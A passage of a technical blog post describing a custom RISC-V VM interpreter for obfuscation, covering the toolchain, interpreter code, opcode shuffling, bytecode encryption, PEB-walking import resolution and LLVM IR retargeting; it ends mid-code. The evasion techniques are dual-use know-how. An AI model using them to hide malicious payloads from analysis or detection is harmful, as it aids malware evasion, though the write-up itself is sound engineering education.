Normal view

There are new articles available, click to refresh the page.
Before yesterdayReverse Engineering

RISC-Y Business: Raging against the reduced machine

24 December 2023 at 11:00

Abstract

In recent years the interest in obfuscation has increased, mainly because people want to protect their intellectual property. Unfortunately, most of what’s been written is focused on the theoretical aspects. In this article, we will discuss the practical engineering challenges of developing a low-footprint virtual machine interpreter. The VM is easily embeddable, built on open-source technology and has various hardening features that were achieved with minimal effort.

Introduction

In addition to protecting intellectual property, a minimal virtual machine can be useful for other reasons. You might want to have an embeddable interpreter to execute business logic (shellcode), without having to deal with RWX memory. It can also be useful as an educational tool, or just for fun.

Creating a custom VM architecture (similar to VMProtect/Themida) means that we would have to deal with binary rewriting/lifting or write our own compiler. Instead, we decided to use a preexisting architecture, which would be supported by LLVM: RISC-V. This architecture is already widely used for educational purposes and has the advantage of being very simple to understand and implement.

Initially, the main contender was WebAssembly. However, existing interpreters were very bloated and would also require dealing with a binary format. Additionally, it looks like WASM64 is very underdeveloped and our memory model requires 64-bit pointer support. SPARC and PowerPC were also considered, but RISC-V seems to be more popular and there are a lot more resources available for it.

WebAssembly was designed for sandboxing and therefore strictly separates guest and host memory. Because we will be writing our own RISC-V interpreter, we chose to instead share memory between the guest and the host. This means that pointers in the RISC-V execution context (the guest) are valid in the host process and vice-versa.

As a result, the instructions responsible for reading/writing memory can be implemented as a simple memcpy call and we do not need additional code to translate/validate memory accesses (which helps with our goal of small code size). With this property, we need to implement only two system calls to perform arbitrary operations in the host process:

uintptr_t riscvm_get_peb();
uintptr_t riscvm_host_call(uintptr_t rip, uintptr_t args[13]);

The riscvm_get_peb is Windows-specific and it allows us to resolve exports, which we can then pass to the riscvm_host_call function to execute arbitrary code. Additionally, an optional host_syscall stub could be implemented, but this is not strictly necessary since we can just call the functions in ntdll.dll instead.

Toolchain and CRT

To keep the interpreter footprint as low as possible, we decided to develop a toolchain that outputs a freestanding binary. The goal is to copy this binary into memory and point the VM’s program counter there to start execution. Because we are in freestanding mode, there is no C runtime available to us, this requires us to handle initialization ourselves.

As an example, we will use the following hello.c file:

int _start() {
    int result = 0;
    for(int i = 0; i < 52; i++) {
        result += *(volatile int*)&i;
    }
    return result + 11;
}

We compile the program with the following incantation:

clang -target riscv64 -march=rv64im -mcmodel=medany -Os -c hello.c -o hello.o

And then verify by disassembling the object:

$ llvm-objdump --disassemble hello.o

hello.o:        file format elf64-littleriscv

0000000000000000 <_start>:
       0: 13 01 01 ff   addi    sp, sp, -16
       4: 13 05 00 00   li      a0, 0
       8: 23 26 01 00   sw      zero, 12(sp)
       c: 93 05 30 03   li      a1, 51

0000000000000010 <.LBB0_1>:
      10: 03 26 c1 00   lw      a2, 12(sp)
      14: 33 05 a6 00   add     a0, a2, a0
      18: 9b 06 16 00   addiw   a3, a2, 1
      1c: 23 26 d1 00   sw      a3, 12(sp)
      20: 63 40 b6 00   blt     a2, a1, 0x20 <.LBB0_1+0x10>
      24: 1b 05 b5 00   addiw   a0, a0, 11
      28: 13 01 01 01   addi    sp, sp, 16
      2c: 67 80 00 00   ret

The hello.o is a regular ELF object file. To get a freestanding binary we need to invoke the linker with a linker script:

ENTRY(_start)

LINK_BASE = 0x8000000;

SECTIONS
{
    . = LINK_BASE;
    __base = .;

    .text : ALIGN(16) {
        . = LINK_BASE;
        *(.text)
        *(.text.*)
    }

    .data : {
        *(.rodata)
        *(.rodata.*)
        *(.data)
        *(.data.*)
        *(.eh_frame)
    }

    .init : {
        __init_array_start = .;
        *(.init_array)
        __init_array_end = .;
    }

    .bss : {
        *(.bss)
        *(.bss.*)
        *(.sbss)
        *(.sbss.*)
    }

    .relocs : {
        . = . + SIZEOF(.bss);
        __relocs_start = .;
    }
}

This script is the result of an excessive amount of swearing and experimentation. The format is .name : { ... } where .name is the destination section and the stuff in the brackets is the content to paste in there. The special . operator is used to refer to the current position in the binary and we define a few special symbols for use by the runtime:

Symbol Meaning
__base Base of the executable.
__init_array_start Start of the C++ init arrays.
__init_array_end End of the C++ init arrays.
__relocs_start Start of the relocations (end of the binary).

These symbols are declared as extern in the C code and they will be resolved at link-time. While it may seem confusing at first that we have a destination section, it starts to make sense once you realize the linker has to output a regular ELF executable. That ELF executable is then passed to llvm-objcopy to create the freestanding binary blob. This makes debugging a whole lot easier (because we get DWARF symbols) and since we will not implement an ELF loader, it also allows us to extract the relocations for embedding into the final binary.

To link the intermediate ELF executable and then create the freestanding hello.pre.bin:

ld.lld.exe -o hello.elf --oformat=elf -emit-relocs -T ..\lib\linker.ld --Map=hello.map hello.o
llvm-objcopy -O binary hello.elf hello.pre.bin

For debugging purposes we also output hello.map, which tells us exactly where the linker put the code/data:

             VMA              LMA     Size Align Out     In      Symbol
               0                0        0     1 LINK_BASE = 0x8000000
               0                0  8000000     1 . = LINK_BASE
         8000000                0        0     1 __base = .
         8000000          8000000       30    16 .text
         8000000          8000000        0     1         . = LINK_BASE
         8000000          8000000       30     4         hello.o:(.text)
         8000000          8000000       30     1                 _start
         8000010          8000010        0     1                 .LBB0_1
         8000030          8000030        0     1 .init
         8000030          8000030        0     1         __init_array_start = .
         8000030          8000030        0     1         __init_array_end = .
         8000030          8000030        0     1 .relocs
         8000030          8000030        0     1         . = . + SIZEOF ( .bss )
         8000030          8000030        0     1         __relocs_start = .
               0                0       18     8 .rela.text
               0                0       18     8         hello.o:(.rela.text)
               0                0       3b     1 .comment
               0                0       3b     1         <internal>:(.comment)
               0                0       30     1 .riscv.attributes
               0                0       30     1         <internal>:(.riscv.attributes)
               0                0      108     8 .symtab
               0                0      108     8         <internal>:(.symtab)
               0                0       55     1 .shstrtab
               0                0       55     1         <internal>:(.shstrtab)
               0                0       5c     1 .strtab
               0                0       5c     1         <internal>:(.strtab)

The final ingredient of the toolchain is a small Python script (relocs.py) that extracts the relocations from the ELF file and appends them to the end of the hello.pre.bin. The custom relocation format only supports R_RISCV_64 and is resolved by our CRT like so:

typedef struct
{
    uint8_t  type;
    uint32_t offset;
    int64_t  addend;
} __attribute__((packed)) Relocation;

extern uint8_t __base[];
extern uint8_t __relocs_start[];

#define LINK_BASE    0x8000000
#define R_RISCV_NONE 0
#define R_RISCV_64   2

static __attribute((noinline)) void riscvm_relocs()
{
    if (*(uint32_t*)__relocs_start != 'ALER')
    {
        asm volatile("ebreak");
    }

    uintptr_t load_base = (uintptr_t)__base;

    for (Relocation* itr = (Relocation*)(__relocs_start + sizeof(uint32_t)); itr->type != R_RISCV_NONE; itr++)
    {
        if (itr->type == R_RISCV_64)
        {
            uint64_t* ptr = (uint64_t*)((uintptr_t)itr->offset - LINK_BASE + load_base);
            *ptr -= LINK_BASE;
            *ptr += load_base;
        }
        else
        {
            asm volatile("ebreak");
        }
    }
}

As you can see, the __base and __relocs_start magic symbols are used here. The only reason this works is the -mcmodel=medany we used when compiling the object. You can find more details in this article and in the RISC-V ELF Specification. In short, this flag allows the compiler to assume that all code will be emitted in a 2 GiB address range, which allows more liberal PC-relative addressing. The R_RISCV_64 relocation type gets emitted when you put pointers in the .data section:

void* functions[] = {
    &function1,
    &function2,
};

This also happens when using vtables in C++, and we wanted to support these properly early on, instead of having to fight with horrifying bugs later.

The next piece of the CRT involves the handling of the init arrays (which get emitted by global instances of classes that have a constructor):

typedef void (*InitFunction)();
extern InitFunction __init_array_start;
extern InitFunction __init_array_end;

static __attribute((optnone)) void riscvm_init_arrays()
{
    for (InitFunction* itr = &__init_array_start; itr != &__init_array_end; itr++)
    {
        (*itr)();
    }
}

Frustratingly, we were not able to get this function to generate correct code without the __attribute__((optnone)). We suspect this has to do with aliasing assumptions (the start/end can technically refer to the same memory), but we didn’t investigate this further.

Interpreter internals

Note: the interpreter was initially based on riscvm.c by edubart. However, we have since completely rewritten it in C++ to better suit our purpose.

Based on the RISC-V Calling Conventions document, we can create an enum for the 32 registers:

enum RegIndex
{
    reg_zero, // always zero (immutable)
    reg_ra,   // return address
    reg_sp,   // stack pointer
    reg_gp,   // global pointer
    reg_tp,   // thread pointer
    reg_t0,   // temporary
    reg_t1,
    reg_t2,
    reg_s0,   // callee-saved
    reg_s1,
    reg_a0,   // arguments
    reg_a1,
    reg_a2,
    reg_a3,
    reg_a4,
    reg_a5,
    reg_a6,
    reg_a7,
    reg_s2,   // callee-saved
    reg_s3,
    reg_s4,
    reg_s5,
    reg_s6,
    reg_s7,
    reg_s8,
    reg_s9,
    reg_s10,
    reg_s11,
    reg_t3,   // temporary
    reg_t4,
    reg_t5,
    reg_t6,
};

We just need to add a pc register and we have the structure to represent the RISC-V CPU state:

struct riscvm
{
    int64_t  pc;
    uint64_t regs[32];
};

It is important to keep in mind that the zero register is always set to 0 and we have to prevent writes to it by using a macro:

#define reg_write(idx, value)        \
    do                               \
    {                                \
        if (LIKELY(idx != reg_zero)) \
        {                            \
            self->regs[idx] = value; \
        }                            \
    } while (0)

The instructions (ignoring the optional compression extension) are always 32-bits in length and can be cleanly expressed as a union:

union Instruction
{
    struct
    {
        uint32_t compressed_flags : 2;
        uint32_t opcode           : 5;
        uint32_t                  : 25;
    };

    struct
    {
        uint32_t opcode : 7;
        uint32_t rd     : 5;
        uint32_t funct3 : 3;
        uint32_t rs1    : 5;
        uint32_t rs2    : 5;
        uint32_t funct7 : 7;
    } rtype;

    struct
    {
        uint32_t opcode : 7;
        uint32_t rd     : 5;
        uint32_t funct3 : 3;
        uint32_t rs1    : 5;
        uint32_t rs2    : 5;
        uint32_t shamt  : 1;
        uint32_t imm    : 6;
    } rwtype;

    struct
    {
        uint32_t opcode : 7;
        uint32_t rd     : 5;
        uint32_t funct3 : 3;
        uint32_t rs1    : 5;
        uint32_t imm    : 12;
    } itype;

    struct
    {
        uint32_t opcode : 7;
        uint32_t rd     : 5;
        uint32_t imm    : 20;
    } utype;

    struct
    {
        uint32_t opcode : 7;
        uint32_t rd     : 5;
        uint32_t imm12  : 8;
        uint32_t imm11  : 1;
        uint32_t imm1   : 10;
        uint32_t imm20  : 1;
    } ujtype;

    struct
    {
        uint32_t opcode : 7;
        uint32_t imm5   : 5;
        uint32_t funct3 : 3;
        uint32_t rs1    : 5;
        uint32_t rs2    : 5;
        uint32_t imm7   : 7;
    } stype;

    struct
    {
        uint32_t opcode   : 7;
        uint32_t imm_11   : 1;
        uint32_t imm_1_4  : 4;
        uint32_t funct3   : 3;
        uint32_t rs1      : 5;
        uint32_t rs2      : 5;
        uint32_t imm_5_10 : 6;
        uint32_t imm_12   : 1;
    } sbtype;

    int16_t  chunks16[2];
    uint32_t bits;
};
static_assert(sizeof(Instruction) == sizeof(uint32_t), "");

There are 13 top-level opcodes (Instruction.opcode) and some of those opcodes have another field that further specializes the functionality (i.e. Instruction.itype.funct3). To keep the code readable, the enumerations for the opcode are defined in opcodes.h. The interpreter is structured to have handler functions for the top-level opcode in the following form:

bool handler_rv64_<opcode>(riscvm_ptr self, Instruction inst);

As an example, we can look at the handler for the lui instruction (note that the handlers themselves are responsible for updating pc):

ALWAYS_INLINE static bool handler_rv64_lui(riscvm_ptr self, Instruction inst)
{
    int64_t imm = bit_signer(inst.utype.imm, 20) << 12;
    reg_write(inst.utype.rd, imm);

    self->pc += 4;
    dispatch(); // return true;
}

The interpreter executes until one of the handlers returns false, indicating the CPU has to halt:

void riscvm_run(riscvm_ptr self)
{
    while (true)
    {
        Instruction inst;
        inst.bits = *(uint32_t*)self->pc;
        if (!riscvm_execute_handler(self, inst))
            break;
    }
}

Plenty of articles have been written about the semantics of RISC-V, so you can look at the source code if you’re interested in the implementation details of individual instructions. The structure of the interpreter also allows us to easily implement obfuscation features, which we will discuss in the next section.

For now, we will declare the handler functions as __attribute__((always_inline)) and set the -fno-jump-tables compiler option, which gives us a riscvm_run function that (comfortably) fits into a single page (0xCA4 bytes):

interpreter control flow graph

Hardening features

A regular RISC-V interpreter is fun, but an attacker can easily reverse engineer our payload by throwing it into Ghidra to decompile it. To force the attacker to at least look at our VM interpreter, we implemented a few security features. These features are implemented in a Python script that parses the linker MAP file and directly modifies the opcodes: encrypt.py.

Opcode shuffling

The most elegant (and likely most effective) obfuscation is to simply reorder the enums of the instruction opcodes and sub-functions. The shuffle.py script is used to generate shuffled_opcodes.h, which is then included into riscvm.h instead of opcodes.h to mix the opcodes:

#ifdef OPCODE_SHUFFLING
#warning Opcode shuffling enabled
#include "shuffled_opcodes.h"
#else
#include "opcodes.h"
#endif // OPCODE_SHUFFLING

There is also a shuffled_opcodes.json file generated, which is parsed by encrypt.py to know how to shuffle the assembled instructions.

Because enums are used for all the opcodes, we only need to recompile the interpreter to obfuscate it; there is no additional complexity cost in the implementation.

Bytecode encryption

To increase diversity between payloads for the same VM instance, we also employ a simple ‘encryption’ scheme on top of the opcode:

ALWAYS_INLINE static uint32_t tetra_twist(uint32_t input)
{
    /**
     * Custom hash function that is used to generate the encryption key.
     * This has strong avalanche properties and is used to ensure that
     * small changes in the input result in large changes in the output.
     */

    constexpr uint32_t prime1 = 0x9E3779B1; // a large prime number

    input ^= input >> 15;
    input *= prime1;
    input ^= input >> 12;
    input *= prime1;
    input ^= input >> 4;
    input *= prime1;
    input ^= input >> 16;

    return input;
}

ALWAYS_INLINE static uint32_t transform(uintptr_t offset, uint32_t key)
{
    uint32_t key2 = key + offset;
    return tetra_twist(key2);
}

ALWAYS_INLINE static uint32_t riscvm_fetch(riscvm_ptr self)
{
    uint32_t data;
    memcpy(&data, (const void*)self->pc, sizeof(data));

#ifdef CODE_ENCRYPTION
    return data ^ transform(self->pc - self->base, self->key);
#else
    return data;
#endif // CODE_ENCRYPTION
}

The offset relative to the start of the bytecode is used as the seed to a simple transform function. The result of this function is XOR’d with the instruction data before decoding. The exact transformation doesn’t really matter, because an attacker can always observe the decrypted bytecode at runtime. However, static analysis becomes more difficult and pattern-matching the payload is prevented, all for a relatively small increase in VM implementation complexity.

It would be possible to encrypt the contents of the .data section of the payload as well, but we would have to completely decrypt it in memory before starting execution anyway. Technically, it would be also possible to implement a lazy encryption scheme by customizing the riscvm_read and riscvm_write functions to intercept reads/writes to the payload region, but this idea was not pursued further.

Threaded handlers

The most interesting feature of our VM is that we only need to make minor code modifications to turn it into a so-called threaded interpreter. Threaded code is a well-known technique used both to speed up emulators and to introduce indirect branches that complicate reverse engineering. It is called threading because the execution can be visualized as a thread of handlers that directly branch to the next handler. There is no classical dispatch function, with an infinite loop and a switch case for each opcode inside. The performance improves because there are fewer false-positives in the branch predictor when executing threaded code. You can find more information about threaded interpreters in the Dispatch Techniques section of the YETI paper.

The first step is to construct a handler table, where each handler is placed at the index corresponding to each opcode. To do this we use a small snippet of constexpr C++ code:

typedef bool (*riscvm_handler_t)(riscvm_ptr, Instruction);

static constexpr std::array<riscvm_handler_t, 32> riscvm_handlers = []
{
    // Pre-populate the table with invalid handlers
    std::array<riscvm_handler_t, 32> result = {};
    for (size_t i = 0; i < result.size(); i++)
    {
        result[i] = handler_rv64_invalid;
    }

    // Insert the opcode handlers at the right index
#define INSERT(op) result[op] = HANDLER(op)
    INSERT(rv64_load);
    INSERT(rv64_fence);
    INSERT(rv64_imm64);
    INSERT(rv64_auipc);
    INSERT(rv64_imm32);
    INSERT(rv64_store);
    INSERT(rv64_op64);
    INSERT(rv64_lui);
    INSERT(rv64_op32);
    INSERT(rv64_branch);
    INSERT(rv64_jalr);
    INSERT(rv64_jal);
    INSERT(rv64_system);
#undef INSERT
    return result;
}();

With the riscvm_handlers table populated we can define the dispatch macro:

#define dispatch()                                       \
    Instruction next;                                    \
    next.bits = riscvm_fetch(self);                      \
    if (next.compressed_flags != 0b11)                   \
    {                                                    \
        panic("compressed instructions not supported!"); \
    }                                                    \
    __attribute__((musttail)) return riscvm_handlers[next.opcode](self, next)

The musttail attribute forces the call to the next handler to be a tail call. This is only possible because all the handlers have the same function signature and it generates an indirect branch to the next handler:

threaded handler disassembly

The final piece of the puzzle is the new implementation of the riscvm_run function, which uses an empty riscvm_execute handler to bootstrap the chain of execution:

ALWAYS_INLINE static bool riscvm_execute(riscvm_ptr self, Instruction inst)
{
    dispatch();
}

NEVER_INLINE void riscvm_run(riscvm_ptr self)
{
    Instruction inst;
    riscvm_execute(self, inst);
}

Traditional obfuscation

The built-in hardening features that we can get with a few #ifdefs and a small Python script are good enough for a proof-of-concept, but they are not going to deter a determined attacker for a very long time. An attacker can pattern-match the VM’s handlers to simplify future reverse engineering efforts. To address this, we can employ common obfuscation techniques using LLVM obfuscation passes:

  • Instruction substitution (to make pattern matching more difficult)
  • Opaque predicates (to hinder static analysis)
  • Inject anti-debug checks (to make dynamic analysis more difficult)

The paper Modern obfuscation techniques by Roman Oravec gives a nice overview of literature and has good data on what obfuscation passes are most effective considering their runtime overhead.

Additionally, it would also be possible to further enhance the VM’s security by duplicating handlers, but this would require extra post-processing on the payload itself. The VM itself is only part of what could be obfuscated. Obfuscating the payloads themselves is also something we can do quite easily. Most likely, manually-integrated security features (stack strings with xorstr, lazy_importer and variable encryption) will be most valuable here. However, because we use LLVM to build the payloads we can also employ automated obfuscation there. It is important to keep in mind that any overhead created in the payloads themselves is multiplied by the overhead created by the handler obfuscation, so experimentation is required to find the sweet spot for your use case.

Writing the payloads

The VM described in this post so far technically has the ability to execute arbitrary code. That being said, it would be rather annoying for an end-user to write said code. For example, we would have to manually resolve all imports and then use the riscvm_host_call function to actually execute them. These functions are executing in the RISC-V context and their implementation looks like this:

uintptr_t riscvm_host_call(uintptr_t address, uintptr_t args[13])
{
    register uintptr_t a0 asm("a0") = address;
    register uintptr_t a1 asm("a1") = (uintptr_t)args;
    register uintptr_t a7 asm("a7") = 20000;
    asm volatile("scall" : "+r"(a0) : "r"(a1), "r"(a7));
    return a0;
}

uintptr_t riscvm_get_peb()
{
    register uintptr_t a0 asm("a0") = 0;
    register uintptr_t a7 asm("a7") = 20001;
    asm volatile("scall" : "+r"(a0) : "r"(a7) : "memory");
    return a0;
}

We can get a pointer to the PEB using riscvm_get_peb and then resolve a module by its’ x65599 hash:

// Structure definitions omitted for clarity
uintptr_t riscvm_resolve_dll(uint32_t module_hash)
{
    static PEB* peb = 0;
    if (!peb)
    {
        peb = (PEB*)riscvm_get_peb();
    }
    LIST_ENTRY* begin = &peb->Ldr->InLoadOrderModuleList;
    for (LIST_ENTRY* itr = begin->Flink; itr != begin; itr = itr->Flink)
    {
        LDR_DATA_TABLE_ENTRY* entry = CONTAINING_RECORD(itr, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
        if (entry->BaseNameHashValue == module_hash)
        {
            return (uintptr_t)entry->DllBase;
        }
    }
    return 0;
}

Once we’ve obtained the base of the module we’re interested in, we can resolve the import by walking the export table:

uintptr_t riscvm_resolve_import(uintptr_t image, uint32_t export_hash)
{
    IMAGE_DOS_HEADER*       dos_header      = (IMAGE_DOS_HEADER*)image;
    IMAGE_NT_HEADERS*       nt_headers      = (IMAGE_NT_HEADERS*)(image + dos_header->e_lfanew);
    uint32_t                export_dir_size = nt_headers->OptionalHeader.DataDirectory[0].Size;
    IMAGE_EXPORT_DIRECTORY* export_dir =
        (IMAGE_EXPORT_DIRECTORY*)(image + nt_headers->OptionalHeader.DataDirectory[0].VirtualAddress);
    uint32_t* names = (uint32_t*)(image + export_dir->AddressOfNames);
    uint32_t* funcs = (uint32_t*)(image + export_dir->AddressOfFunctions);
    uint16_t* ords  = (uint16_t*)(image + export_dir->AddressOfNameOrdinals);

    for (uint32_t i = 0; i < export_dir->NumberOfNames; ++i)
    {
        char*     name = (char*)(image + names[i]);
        uintptr_t func = (uintptr_t)(image + funcs[ords[i]]);
        // Ignore forwarded exports
        if (func >= (uintptr_t)export_dir && func < (uintptr_t)export_dir + export_dir_size)
            continue;
        uint32_t hash = hash_x65599(name, true);
        if (hash == export_hash)
        {
            return func;
        }
    }

    return 0;
}

Now we can call MessageBoxA from RISC-V with the following code:

// NOTE: We cannot use Windows.h here
#include <stdint.h>

int main()
{
    // Resolve LoadLibraryA
    auto kernel32_dll = riscvm_resolve_dll(hash_x65599("kernel32.dll", false))
    auto LoadLibraryA = riscvm_resolve_import(kernel32_dll, hash_x65599("LoadLibraryA", true))

    // Load user32.dll
    uint64_t args[13];
    args[0] = (uint64_t)"user32.dll";
    auto user32_dll = riscvm_host_call(LoadLibraryA, args);

    // Resolve MessageBoxA
    auto MessageBoxA = riscvm_resolve_import(user32_dll, hash_x65599("MessageBoxA", true));

    // Show a message to the user
    args[0] = 0; // hwnd
    args[1] = (uint64_t)"Hello from RISC-V!"; // msg
    args[2] = (uint64_t)"riscvm"; // title
    args[3] = 0; // flags
    riscvm_host_call(MessageBoxA, args);
}

With some templates/macros/constexpr tricks we can probably get this down to something more readable, but fundamentally this code will always stay annoying to write. Even if calling imports were a one-liner, we would still have to deal with the fact that we cannot use Windows.h (or any of the Microsoft headers for that matter). The reason for this is that we are cross-compiling with Clang. Even if we were to set up the include paths correctly, it would still be a major pain to get everything to compile correctly. That being said, our VM works! A major advantage of RISC-V is that, since the instruction set is simple, once the fundamentals work, we can be confident that features built on top of this will execute as expected.

Whole Program LLVM

Usually, when discussing LLVM, the compilation process is running on Linux/macOS. In this section, we will describe a pipeline that can actually be used on Windows, without making modifications to your toolchain. This is useful if you would like to analyze/fuzz/obfuscate Windows applications, which might only compile an MSVC-compatible compiler: clang-cl.

Link-time optimization (LTO)

Without LTO, the object files produced by Clang are native COFF/ELF/Mach-O files. Every file is optimized and compiled independently. The linker loads these objects and merges them together into the final executable.

When enabling LTO, the object files are instead LLVM Bitcode (.bc) files. This allows the linker to merge all the LLVM IR together and perform (more comprehensive) whole-program optimizations. After the LLVM IR has been optimized, the native code is generated and the final executable produced. The diagram below comes from the great Link-time optimisation (LTO) post by Ryan Stinnet:

LTO workflow

Compiler wrappers

Unfortunately, it can be quite annoying to write an executable that can replace the compiler. It is quite simple when dealing with a few object files, but with bigger projects it gets quite tricky (especially when CMake is involved). Existing projects are WLLVM and gllvm, but they do not work nicely on Windows. When using CMake, you can use the CMAKE_<LANG>_COMPILER_LAUNCHER variables and intercept the compilation pipeline that way, but that is also tricky to deal with.

On Windows, things are more complex than on Linux. This is because Clang uses a different program to link the final executable and correctly intercepting this process can become quite challenging.

Embedding bitcode

To achieve our goal of post-processing the bitcode of the whole program, we need to enable bitcode embedding. The first flag we need is -flto, which enables LTO. The second flag is -lto-embed-bitcode, which isn’t documented very well. When using clang-cl, you also need a special incantation to enable it:

set(EMBED_TYPE "post-merge-pre-opt") # post-merge-pre-opt/optimized
if(NOT CMAKE_CXX_COMPILER_ID MATCHES "Clang")
    if(WIN32)
        message(FATAL_ERROR "clang-cl is required, use -T ClangCL --fresh")
    else()
        message(FATAL_ERROR "clang compiler is required")
    endif()
elseif(CMAKE_CXX_COMPILER_FRONTEND_VARIANT MATCHES "^MSVC$")
    # clang-cl
    add_compile_options(-flto)
    add_link_options(/mllvm:-lto-embed-bitcode=${EMBED_TYPE})
elseif(WIN32)
    # clang (Windows)
    add_compile_options(-fuse-ld=lld-link -flto)
    add_link_options(-Wl,/mllvm:-lto-embed-bitcode=${EMBED_TYPE})
else()
	# clang (Linux)
    add_compile_options(-fuse-ld=lld -flto)
    add_link_options(-Wl,-lto-embed-bitcode=${EMBED_TYPE})
endif()

The -lto-embed-bitcode flag creates an additional .llvmbc section in the final executable that contains the bitcode. It offers three settings:

-lto-embed-bitcode=<value> - Embed LLVM bitcode in object files produced by LTO
    =none                  - Do not embed 
    =optimized             - Embed after all optimization passes
    =post-merge-pre-opt    - Embed post merge, but before optimizations

Once the bitcode is embedded within the output binary, it can be extracted using llvm-objcopy and disassembled with llvm-dis. This is normally done as the follows:

llvm-objcopy --dump-section=.llvmbc=program.bc program
llvm-dis program.bc > program.ll

Unfortunately, we discovered a bug/oversight in LLD on Windows. The section is extracted without errors, but llvm-dis fails to load the bitcode. The reason for this is that Windows executables have a FileAlignment attribute, leading to additional padding with zeroes. To get valid bitcode, you need to remove some of these trailing zeroes:

import argparse
import sys
import pefile

def main():
    # Parse the arguments
    parser = argparse.ArgumentParser()
    parser.add_argument("executable", help="Executable with embedded .llvmbc section")
    parser.add_argument("--output", "-o", help="Output file name", required=True)
    args = parser.parse_args()
    executable: str = args.executable
    output: str = args.output

    # Find the .llvmbc section
    pe = pefile.PE(executable)
    llvmbc = None
    for section in pe.sections:
        if section.Name.decode("utf-8").strip("\x00") == ".llvmbc":
            llvmbc = section
            break
    if llvmbc is None:
        print("No .llvmbc section found")
        sys.exit(1)

    # Recover the bitcode and write it to a file
    with open(output, "wb") as f:
        data = bytearray(llvmbc.get_data())
        # Truncate all trailing null bytes
        while data[-1] == 0:
            data.pop()
        # Recover alignment to 4
        while len(data) % 4 != 0:
            data.append(0)
        # Add a block end marker
        for _ in range(4):
            data.append(0)
        f.write(data)

if __name__ == "__main__":
    main()

In our testing, this doesn’t have any issues, but there might be cases where this heuristic does not work properly. In that case, a potential solution could be to brute force the amount of trailing zeroes, until the bitcode parses without errors.

Applications

Now that we have access to our program’s bitcode, several applications become feasible:

  • Write an analyzer to identify potentially interesting locations within the program.
  • Instrument the bitcode and then re-link the executable, which is particularly useful for code coverage while fuzzing.
  • Obfuscate the bitcode before re-linking the executable, enhancing security.
  • IR retargeting, where the bitcode compiled for one architecture can be used on another.

Relinking the executable

The bitcode itself unfortunately does not contain enough information to re-link the executable (although this is something we would like to implement upstream). We could either manually attempt to reconstruct the linker command line (with tools like Process Monitor), or use LLVM plugin support. Plugin support is not really functional on Windows (although there is some indication that Sony is using it for their PS4/PS5 toolchain), but we can still load an arbitrary DLL using the -load command line flag. Once we loaded our DLL, we can hijack the executable command line and process the flags to generate a script for re-linking the program after our modifications are done.

Retargeting LLVM IR

Ideally, we would want to write code like this and magically get it to run in our VM:

#include <Windows.h>

int main()
{
    MessageBoxA(0, "Hello from RISC-V!", "riscvm", 0);
}

Luckily this is entirely possible, it just requires writing a (fairly) simple tool to perform transformations on the Bitcode of this program (built using clang-cl). In the coming sections, we will describe how we managed to do this using Microsoft Visual Studio’s official LLVM integration (i.e. without having to use a custom fork of clang-cl).

The LLVM IR of the example above looks roughly like this (it has been cleaned up slightly for readability):

source_filename = "hello.c"
target datalayout = "e-m:w-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-windows-msvc19.38.33133"

@message = dso_local global [19 x i8] c"Hello from RISC-V!\00", align 16
@title = dso_local global [7 x i8] c"riscvm\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = call i32 @MessageBoxA(ptr noundef null, ptr noundef @message, ptr noundef @title, i32 noundef 0)
  ret i32 0
}

declare dllimport i32 @MessageBoxA(ptr noundef, ptr noundef, ptr noundef, i32 noundef) #1

attributes #0 = { noinline nounwind optnone uwtable "min-legal-vector-width"="0" "no-trapping-math"="true" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+cx8,+fxsr,+mmx,+sse,+sse2,+x87" "tune-cpu"="generic" }
attributes #1 = { "no-trapping-math"="true" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+cx8,+fxsr,+mmx,+sse,+sse2,+x87" "tune-cpu"="generic" }

!llvm.linker.options = !{!0, !0}
!llvm.module.flags = !{!1, !2, !3}
!llvm.ident = !{!4}

!0 = !{!"/DEFAULTLIB:uuid.lib"}
!1 = !{i32 1, !"wchar_size", i32 2}
!2 = !{i32 8, !"PIC Level", i32 2}
!3 = !{i32 7, !"uwtable", i32 2}
!4 = !{!"clang version 16.0.5"}

To retarget this code to RISC-V, we need to do the following:

  • Collect all the functions with a dllimport storage class.
  • Generate a riscvm_imports function that resolves all the function addresses of the imports.
  • Replace the dllimport functions with stubs that use riscvm_host_call to call the import.
  • Change the target triple to riscv64-unknown-unknown and adjust the data layout.
  • Compile the retargeted bitcode and link it together with crt0 to create the final payload.

Adjusting the metadata

After loading the LLVM IR Module, the first step is to change the DataLayout and the TargetTriple to be what the RISC-V backend expects:

module.setDataLayout("e-m:e-p:64:64-i64:64-i128:128-n32:64-S128");
module.setTargetTriple("riscv64-unknown-unknown");
module.setSourceFileName("transpiled.bc");

The next step is to collect all the dllimport functions for later processing. Additionally, a bunch of x86-specific function attributes are removed from every function:

std::vector<Function*> importedFunctions;
for (Function& function : module.functions())
{
	// Remove x86-specific function attributes
	function.removeFnAttr("target-cpu");
	function.removeFnAttr("target-features");
	function.removeFnAttr("tune-cpu");
	function.removeFnAttr("stack-protector-buffer-size");

	// Collect imported functions
	if (function.hasDLLImportStorageClass() && !function.getName().startswith("riscvm_"))
	{
		importedFunctions.push_back(&function);
	}
	function.setDLLStorageClass(GlobalValue::DefaultStorageClass);

Finally, we have to remove the llvm.linker.options metadata to make sure we can pass the IR to llc or clang without errors.

Import map

The LLVM IR only has the dllimport storage class to inform us that a function is imported. Unfortunately, it does not provide us with the DLL the function comes from. Because this information is only available at link-time (in files like user32.lib), we decided to implement an extra -importmap argument.

The extract-bc script that extracts the .llvmbc section now also has to extract the imported functions and what DLL they come from:

with open(importmap, "wb") as f:
	for desc in pe.DIRECTORY_ENTRY_IMPORT:
		dll = desc.dll.decode("utf-8")
		for imp in desc.imports:
			name = imp.name.decode("utf-8")
			f.write(f"{name}:{dll}\n".encode("utf-8"))

Currently, imports by ordinal and API sets are not supported, but we can easily make sure those do not occur when building our code.

Creating the import stubs

For every dllimport function, we need to add some IR to riscvm_imports to resolve the address. Additionally, we have to create a stub that forwards the function arguments to riscvm_host_call. This is the generated LLVM IR for the MessageBoxA stub:

; Global variable to hold the resolved import address
@import_MessageBoxA = private global ptr null

define i32 @MessageBoxA(ptr noundef %0, ptr noundef %1, ptr noundef %2, i32 noundef %3) local_unnamed_addr #1 {
entry:
  %args = alloca ptr, i32 13, align 8
  %arg3_zext = zext i32 %3 to i64
